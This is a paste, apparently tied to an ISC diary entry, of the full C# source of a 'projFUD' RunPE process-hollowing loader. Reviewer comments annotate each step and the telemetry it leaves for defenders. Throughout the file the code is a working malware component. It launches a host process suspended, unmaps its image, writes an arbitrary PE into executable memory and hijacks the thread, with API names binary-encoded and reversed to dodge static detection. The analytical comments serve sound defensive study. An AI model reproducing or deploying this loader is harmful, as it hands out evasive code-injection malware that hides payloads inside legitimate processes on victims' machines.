
ISC Diary 2021/03/04

xme
Mar 4th, 2021
  1. using System;
  2. using System.Diagnostics;
  3. using System.Runtime.InteropServices;
  4. using Microsoft.VisualBasic;
  5.  
  6. namespace projFUD
  7. {
// NOTE(review): this is the "RunPE" / process-hollowing loader analysed in the
// ISC diary entry. The code is reproduced unchanged; the comments describe what
// each step does and which parts are obfuscation, so that an analyst can read
// it straight through and map it to EDR/Sysmon telemetry.
public static class PA
{
    /// <summary>
    /// Returns <paramref name="Str"/> with its characters in reverse order.
    /// The API and module names in <see cref="AL"/> are stored reversed, so
    /// this undoes that before the names are resolved.
    /// </summary>
    public static string ReverseString(string Str)
    {
        string Revstr = "";
        int Length;
        Length = Str.Length - 1;
        // Walk from the last character down to index 0, appending each one.
        while (Length >= 0)
        {
            Revstr = Revstr + Str[Length];
            Length--;
        }
        return Revstr;
    }

    /// <summary>
    /// Decodes a string of '0'/'1' characters into ASCII text, 8 bits per
    /// byte. Characters other than '0' and '1' are stripped first and any
    /// trailing bits that do not fill a whole byte are dropped. This is the
    /// string-obfuscation scheme that keeps API names out of static string
    /// scans of the assembly.
    /// </summary>
    public static string BinaryToString(string str)
    {
        string chars = System.Text.RegularExpressions.Regex.Replace(str, "[^01]", "");
        // "(len / 8) - 1 + 1" is simply len / 8; the arithmetic is noise.
        byte[] arr = new byte[(chars.Length / 8) - 1 + 1];
        for (int i = 0; i <= arr.Length - 1; i++)
            arr[i] = Convert.ToByte(chars.Substring(i * 8, 8), 2);
        return System.Text.ASCIIEncoding.ASCII.GetString(arr);
    }

    // Delegate signatures for the Win32 / NT APIs that are resolved at runtime
    // by LoadApi below. Thread contexts are passed as a raw int[] instead of a
    // CONTEXT struct, and every address and size is a 32-bit int, so this
    // loader only handles a 32-bit target image.
    private delegate int DelegateResumeThread(IntPtr handle);
    private delegate bool DelegateWow64SetThreadContext(IntPtr thread, int[] context);
    private delegate bool DelegateSetThreadContext(IntPtr thread, int[] context);
    private delegate bool DelegateWow64GetThreadContext(IntPtr thread, int[] context);
    private delegate bool DelegateGetThreadContext(IntPtr thread, int[] context);
    private delegate int DelegateVirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
    private delegate bool DelegateWriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
    private delegate bool DelegateReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
    private delegate int DelegateZwUnmapViewOfSection(IntPtr process, int baseAddress);
    private delegate bool DelegateCreateProcessA(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes,
    bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);


    // Pipe-separated list of binary-encoded, character-reversed module and
    // export names (e.g. AL[0] decodes to "23lenrek", i.e. "kernel32"
    // reversed). The fields below record which index holds which name. None of
    // these names appear in the assembly's import table or as plain strings.
    private static string[] AL = Convert.ToString("0011001000110011011011000110010101101110011100100110010101101011|0110110001101100011001000111010001101110|011001000110000101100101011100100110100001010100011001010110110101110101011100110110010101010010|011101000111100001100101011101000110111001101111010000110110010001100001011001010111001001101000010101000111010001100101010100110011010000110110011101110110111101010111|01110100011110000110010101110100011011100110111101000011011001000110000101100101011100100110100001010100011101000110010101010011|011101000111100001100101011101000110111001101111010000110110010001100001011001010111001001101000010101000111010001100101010001110011010000110110011101110110111101010111|01110100011110000110010101110100011011100110111101000011011001000110000101100101011100100110100001010100011101000110010101000111|0111100001000101011000110110111101101100011011000100000101101100011000010111010101110100011100100110100101010110|011110010111001001101111011011010110010101001101011100110111001101100101011000110110111101110010010100000110010101110100011010010111001001010111|0111100101110010011011110110110101100101010011010111001101110011011001010110001101101111011100100101000001100100011000010110010101010010|0110111001101111011010010111010001100011011001010101001101100110010011110111011101100101011010010101011001110000011000010110110101101110010101010111011101011010|0100000101110011011100110110010101100011011011110111001001010000011001010111010001100001011001010111001001000011|").Split(new string[] { "|" }, StringSplitOptions.None);

    // Still-reversed names; ReverseString is applied when they are resolved.
    private static string Kernel32 = BinaryToString(AL[0]);
    private static string ntdll = BinaryToString(AL[1]);
    private static string RsmThread = BinaryToString(AL[2]);
    private static string Wow64SetThreadCtx = BinaryToString(AL[3]);
    private static string SetThreadCtx = BinaryToString(AL[4]);
    private static string Wow64GetThreadCtx = BinaryToString(AL[5]);
    private static string GetThreadCtx = BinaryToString(AL[6]);
    private static string VirtualAllcEx = BinaryToString(AL[7]);
    private static string WriteProcessMem = BinaryToString(AL[8]);
    private static string ReadProcessMem = BinaryToString(AL[9]);
    private static string ZwUnmapViewOfSec = BinaryToString(AL[10]);
    private static string CreateProcA = BinaryToString(AL[11]);


    // Function pointers resolved once, at type initialisation, from kernel32
    // and ntdll. Because they go through LoadLibraryA/GetProcAddress rather
    // than [DllImport], the only statically visible imports of this class are
    // those two resolver APIs.
    private static readonly DelegateResumeThread ResumeThread = LoadApi<DelegateResumeThread>(ReverseString(Kernel32), ReverseString(RsmThread));
    private static readonly DelegateWow64SetThreadContext Wow64SetThreadContext = LoadApi<DelegateWow64SetThreadContext>(ReverseString(Kernel32), ReverseString(Wow64SetThreadCtx));
    private static readonly DelegateSetThreadContext SetThreadContext = LoadApi<DelegateSetThreadContext>(ReverseString(Kernel32), ReverseString(SetThreadCtx));
    private static readonly DelegateWow64GetThreadContext Wow64GetThreadContext = LoadApi<DelegateWow64GetThreadContext>(ReverseString(Kernel32), ReverseString(Wow64GetThreadCtx));
    private static readonly DelegateGetThreadContext GetThreadContext = LoadApi<DelegateGetThreadContext>(ReverseString(Kernel32), ReverseString(GetThreadCtx));
    private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi<DelegateVirtualAllocEx>(ReverseString(Kernel32), ReverseString(VirtualAllcEx));
    private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi<DelegateWriteProcessMemory>(ReverseString(Kernel32), ReverseString(WriteProcessMem));
    private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi<DelegateReadProcessMemory>(ReverseString(Kernel32), ReverseString(ReadProcessMem));
    private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi<DelegateZwUnmapViewOfSection>(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec));
    private static readonly DelegateCreateProcessA CreateProcessA = LoadApi<DelegateCreateProcessA>(ReverseString(Kernel32), ReverseString(CreateProcA));

    // The two genuinely imported APIs. VBByRefStr marshalling is a VB.NET
    // idiom; together with the Microsoft.VisualBasic usage in Execute it
    // suggests the loader was ported from (or generated for) VB.NET.
    [DllImport("kernel32", SetLastError = true)]
    private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);

    /// <summary>
    /// Resolves export <paramref name="method"/> from module
    /// <paramref name="name"/> and wraps the raw address as a delegate of
    /// type <typeparamref name="CreateApi"/>. No null check is made on either
    /// handle, so a failed lookup surfaces as a failure inside
    /// <c>GetDelegateForFunctionPointer</c> during type initialisation.
    /// </summary>
    private static CreateApi LoadApi<CreateApi>(string name, string method)
    {
        return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
    }

    // Native PROCESS_INFORMATION as filled in by CreateProcessA. Only the
    // handles and the process id are read by Execute.
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    private struct ProcessInformation
    {
        public readonly IntPtr ProcessHandle;
        public readonly IntPtr ThreadHandle;
        public readonly uint ProcessId;
        private readonly uint ThreadId;
    }
    // Native STARTUPINFO passed to CreateProcessA. Only Size (cb) is set; the
    // fields between Title and Reserved2 are collapsed into a 36-byte blob.
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    private struct StartupInformation
    {
        public uint Size;
        private readonly string Reserved1;
        private readonly string Desktop;
        private readonly string Title;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)]
        private readonly byte[] Misc;
        private readonly IntPtr Reserved2;
        private readonly IntPtr StdInput;
        private readonly IntPtr StdOutput;
        private readonly IntPtr StdError;
    }


    /// <summary>
    /// Process hollowing: starts <paramref name="path"/> suspended, replaces
    /// its mapped image with the 32-bit PE in <paramref name="payload"/>,
    /// points the main thread at the payload's entry point and resumes it.
    /// Up to five attempts are made; on any failure the spawned process is
    /// killed and the whole sequence is retried.
    /// For defenders, the telemetry produced is the classic hollowing chain:
    /// CreateProcess with CREATE_SUSPENDED, ReadProcessMemory of the child's
    /// PEB, ZwUnmapViewOfSection, VirtualAllocEx with execute+write
    /// protection, WriteProcessMemory of PE headers and sections,
    /// SetThreadContext and ResumeThread — all from a .NET process whose
    /// import table lists none of these APIs.
    /// </summary>
    /// <param name="path">Host executable to launch and hollow.</param>
    /// <param name="payload">Raw bytes of the 32-bit PE image to inject.</param>
    public static void Execute(string path, byte[] payload)
    {
        for (int i = 0; i < 5; i++)
        {
            int readWrite = 0;
            StartupInformation si = new StartupInformation();
            ProcessInformation pi = new ProcessInformation();
            // Roundabout way of writing (uint)Marshal.SizeOf(...) — STARTUPINFO.cb.
            si.Size = UInt32.Parse(Marshal.SizeOf(typeof(StartupInformation)).ToString());
            // "ToInt32" / "ToInt16" assembled from bytes so the reflection
            // target names are not visible as literals. ToInt16 is never used;
            // BitConverter.ToInt16 is called directly further down.
            string ToInt32 = System.Text.Encoding.Default.GetString(new byte[] { 0x54, 0x6F, 0x49, 0x6E, 0x74, 0x33, 0x32 });
            string ToInt16 = System.Text.Encoding.Default.GetString(new byte[] { 0x54, 0x6F, 0x49, 0x6E, 0x74, 0x31, 0x36 });

            try
            {
                // 4 | 134217728 == 0x4 | 0x08000000: CREATE_SUSPENDED | CREATE_NO_WINDOW.
                if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 4 | 134217728, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
                // The Interaction.CallByName(..., "Invoke", ...) calls below are
                // reflection-on-reflection: the binary literal decodes to
                // "Invoke", so each one is just BitConverter.ToInt32(payload, off).
                // Offset 60 (30*2) is e_lfanew: the file offset of the PE header.
                int fileAddress = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, (30 * 2) } });
                // PE header + 52 (26*2): OptionalHeader.ImageBase of the payload.
                int imageBase = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, fileAddress + (26 * 2) } });
                // 179 ints == 716 bytes, the size of an x86 CONTEXT. Element 0 is
                // ContextFlags; 65538 == 0x10002 == CONTEXT_INTEGER (x86).
                int[] context = new int[Convert.ToInt32(89 + 90)];
                context[0] = 65538;
                // Native GetThreadContext from a 32-bit host, Wow64GetThreadContext
                // from a 64-bit host — either way a 32-bit context is fetched.
                if (IntPtr.Size == 4)
                { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
                else
                { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
                // Index 41 (byte offset 164) is Ebx in the x86 CONTEXT; for a
                // freshly created suspended thread it holds the PEB address.
                int ebx = context[(20 + 21)];
                int baseAddress = 0;
                // PEB + 8 is ImageBaseAddress: where the host image is mapped.
                if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite)) throw new Exception();
                // Only unmap the host image if it occupies the payload's preferred base.
                if (imageBase == baseAddress)
                    if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0) throw new Exception();
                // OptionalHeader.SizeOfImage (+80) and SizeOfHeaders (+84).
                int sizeOfImage = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, fileAddress + 80 });
                int sizeOfHeaders = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, fileAddress + 84 });
                // Always false — the "if (allowOverride)" below is dead code,
                // likely a leftover from the RunPE template this was built from.
                bool allowOverride = false;
                // 12288 == 0x3000 == MEM_COMMIT | MEM_RESERVE; 64 == 0x40 ==
                // PAGE_EXECUTE_READWRITE. An RWX allocation at the payload's
                // preferred base in a remote process is itself a strong signal.
                int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 12288, 64);

                if (newImageBase == 0) throw new Exception();
                // Copy the PE headers, then each section to its virtual address.
                if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception();
                // +248 assumes a PE32 optional header of the standard size, i.e.
                // the section table starts at e_lfanew + 0xF8. +6 is
                // FileHeader.NumberOfSections.
                int sectionOffset = fileAddress + 248;
                short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 6);
                for (int I = 0; I < numberOfSections; I++)
                {
                    // IMAGE_SECTION_HEADER: VirtualAddress (+12), SizeOfRawData
                    // (+16), PointerToRawData (+20); each header is 40 bytes.
                    int virtualAddress = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 12 });
                    int sizeOfRawData = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 16 });
                    int pointerToRawData = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 20 });
                    if (sizeOfRawData != 0)
                    {
                        byte[] sectionData = new byte[sizeOfRawData];
                        Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0, sectionData.Length);
                        if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
                    }
                    sectionOffset += 40;
                }
                // Patch PEB.ImageBaseAddress so the child reports the new image.
                byte[] GB = BitConverter.GetBytes(newImageBase);
                if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, GB, 4, ref readWrite)) throw new Exception();
                // OptionalHeader.AddressOfEntryPoint (+40), via the same
                // "Invoke" indirection as above.
                int addressOfEntryPoint = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, fileAddress + 40 } });
                if (allowOverride) newImageBase = imageBase;
                // Index 44 (byte offset 176) is Eax in the x86 CONTEXT, which the
                // loader redirects to the payload's entry point.
                context[44] = newImageBase + addressOfEntryPoint;
                if (IntPtr.Size == 4)
                {
                    var x = SetThreadContext(pi.ThreadHandle, context);
                    if (!x)
                    {
                        throw new Exception();
                    }
                }
                else
                {
                    var y = Wow64SetThreadContext(pi.ThreadHandle, context);
                    if (!y)
                    {
                        throw new Exception();
                    }
                }

                // ResumeThread, again invoked by name ("Invoke") through the VB
                // runtime rather than called directly on the delegate.
                int r = (int)Interaction.CallByName(ResumeThread, BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { pi.ThreadHandle });

                // -1 * 1 == -1: ResumeThread's failure return value.
                if (r == -1 * 1)
                {
                    throw new Exception();
                }
            }
            catch
            {
                // Any failure: kill the half-hollowed child and try again. If
                // CreateProcessA itself failed, pi.ProcessId is still 0 here —
                // NOTE(review): what GetProcessById(0).Kill() does in that case
                // is not visible from this file.
                Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
                continue;
            }
            // Reached only when every step above succeeded.
            break;
        }
    }
}
  190. }
